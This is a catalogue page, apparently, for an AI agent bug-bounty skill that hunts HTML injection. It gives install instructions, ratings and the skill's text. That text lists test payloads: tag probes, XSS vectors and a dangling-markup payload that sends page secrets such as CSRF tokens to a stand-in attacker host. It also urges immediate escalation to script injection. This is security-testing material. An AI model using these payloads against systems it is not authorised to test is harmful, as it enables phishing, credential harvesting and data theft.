hunt-html-injection
Hunt HTML Injection — user-supplied input is rendered as raw HTML in the response without sanitisation, allowing an attacker to inject arbitrary HTML tags (but not necessarily JavaScript). Lower severity than XSS but enables phishing, UI manipulation, and credential harvesting via injected forms
Install / Use
npx skills add elementalsouls/Claude-BugHunter --skill hunt-html-injectionInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
Education & ResearchSupported Platforms
Our assessment of hunt-html-injection
hunt-html-injection scores 86/100 on our quality scale, 154th of 264 Education & Research skills we index.
Its SKILL.md is 4.3 KB long, split into 5 sections with 1 code example: a solid amount of guidance for an agent.
With 4,669 GitHub stars, it is one of the more widely adopted skills in the catalogue.
Maintenance, license and trust
- The repository was last updated 2 days ago, so hunt-html-injection is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
Safety scan
No issues foundOur scan of the whole file found no instruction hijacking, hidden characters, credential access, data exfiltration or destructive commands.
Automated pattern scan on 2026-09-28. It catches known dangerous patterns, not every risk — read a skill before letting an agent act on it.
hunt-html-injection compared with similar skills
All 4 of these similar skills score higher than hunt-html-injection; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| hunt-html-injection (this skill)by elementalsouls | 86 | 4.7k | 2d ago | SKILL.md |
| last30days-skillby mvanhorn | 100 | 63.1k | today | CLAUDE.md |
| algorithmic-artby anthropics | 100 | 177.9k | 5d ago | SKILL.md |
| pptxby anthropics | 100 | 177.9k | 5d ago | SKILL.md |
| designby nextlevelbuilder | 100 | 130.2k | 7d ago | SKILL.md |
Frequently asked questions
- How do I install hunt-html-injection?
- Run
npx skills add elementalsouls/Claude-BugHunter --skill hunt-html-injection. The install tabs above show the steps for each supported agent. - Which AI agents does hunt-html-injection work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is hunt-html-injection safe to use?
- Our scan of the whole file found no instruction hijacking, hidden characters, credential access, data exfiltration or destructive commands. It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is hunt-html-injection still maintained?
- The repository was last updated 2 days ago, so hunt-html-injection is actively maintained.
Skill content
View source on GitHubname: hunt-html-injection description: "Hunt HTML Injection — user-supplied input is rendered as raw HTML in the response without sanitisation, allowing an attacker to inject arbitrary HTML tags (but not necessarily JavaScript). Lower severity than XSS but enables phishing, UI manipulation, and credential harvesting via injected forms. Use when testing text-display surfaces (search results, profile fields, comments, error messages, feedback forms). For markup that executes JavaScript, escalate to hunt-xss." sources: hackerone_public, public_research report_count: 6
What is HTML Injection
HTML Injection occurs when user input is inserted into a page's HTML without escaping, so injected tags are rendered by the browser as markup rather than displayed as literal text. Unlike XSS, the injected content does not require JavaScript execution — injecting <b>, <h1>, <a>, <img>, or <form> tags is sufficient.
To PROVE impact unambiguously, escalate to an active vector carrying a unique numeric canary — e.g. "><img src=x onerror=alert(91234)> or <svg onload=alert(91234)>. A distinctive 4+ digit number (not alert(1)) distinguishes YOUR reflected injection from the example payloads practice pages embed in their own hint text. Proof = the raw, unescaped vector with your canary appears in the response.
Impact:
- Phishing via injected
<form>or<a href="attacker.com">tags - UI defacement —
<h1>HACKED</h1>renders visually on the page - Credential harvesting via injected login forms
- Redirect via
<meta http-equiv="refresh"> - Stepping stone to XSS (may be blocked by WAF on
<script>but not<img onerror>) - Dangling-markup exfiltration — even with
<script>and event handlers filtered, an unterminated tag can capture page content that follows it. Inject<img src='//attacker.tld/log?html=(no closing quote/>); the browser treats everything up to the next'as the URL, leaking any CSRF token, secret, or PII rendered after your injection point to your server. Works where full XSS is blocked but raw<is reflected. - Email/notification-context injection — a field reflected unescaped into a transactional email (signup confirmation, admin alert, support-chat transcript) renders injected
<a>/<img>/dangling markup in the recipient's inbox — an audience the web UI can't reach, and often the only place HTML is rendered unfiltered. Inject into name/subject/comment, then read the raw email source. Disclosed class: https://hackerone.com/reports/1935628, https://hackerone.com/reports/3556892.
Attack Surface
Any input that is reflected or stored and then displayed in an HTML context:
- Search boxes (
?q=) - Comments, feedback, reviews
- Profile fields (name, bio, username)
- Error messages (
?error=,?message=) - Subject / body of contact forms
- Admin-visible fields (ticket titles, usernames in logs)
Autonomous Testing Priority
Inject a recognisable HTML tag with a unique canary string. Unescaped angle brackets in the response = confirmed injection.
Pattern 1 — Basic HTML tag injection:
<b>CANARY</b>
"><b>CANARY</b>
Use a unique string as CANARY (something distinct to this test run). Proof: the response contains <b>CANARY with literal < angle brackets — not <b>CANARY. A properly encoded app would escape < to <.
Try multiple tag types when <b> is filtered:
<h1>CANARY</h1>— heading tag (often less filtered)<img src=x onerror=CANARY>— attribute context<a href="https://attacker.com">click</a>— link injection (phishing proof)
For stored injection: inject into the storage endpoint, then GET the page where the value is displayed and check for unescaped tags.
Escalate immediately: if <b> injection works, try <script>alert(1)</script> — the same unsanitised input may allow full XSS.
Proof
Confirmed when your injected tag appears in the response body with literal < angle brackets (not HTML-encoded). A safe app renders <b>CANARY</b>; a vulnerable app renders <b>CANARY</b>.
Distinguishing HTML Injection from XSS
- HTML injection:
<b>text</b>renders as text in the browser — no JS execution needed. - XSS:
<script>alert(1)</script>executes JavaScript.
Some WAFs block <script> but pass <b> or <img> — start with non-script tags, then escalate.
Related Skills
last30days-skill
63.1kAI agent skill that researches any topic across Reddit, X, YouTube, HN, Polymarket, and the web - then synthesizes a grounded summary
algorithmic-art
177.9kCreating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields, or particle systems.
pptx
177.9kUse this skill any time a .pptx or .potx file is involved in any way — as input, output, or both. This includes: creating slide decks, pitch decks, or presentations; reading, parsing, or extracting text from any .pptx or .potx file (even if the extracted content will be used elsewhere, like in an em…
design
130.2kComprehensive design skill: brand identity, design tokens, UI styling, logo generation (55 styles, Gemini, Atlas Cloud, or MuAPI AI), corporate identity program (50 deliverables, CIP mockups), HTML presentations (Chart.js), banner design (22 styles, social/ads/web/print), icon design (15 styles, SVG…
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
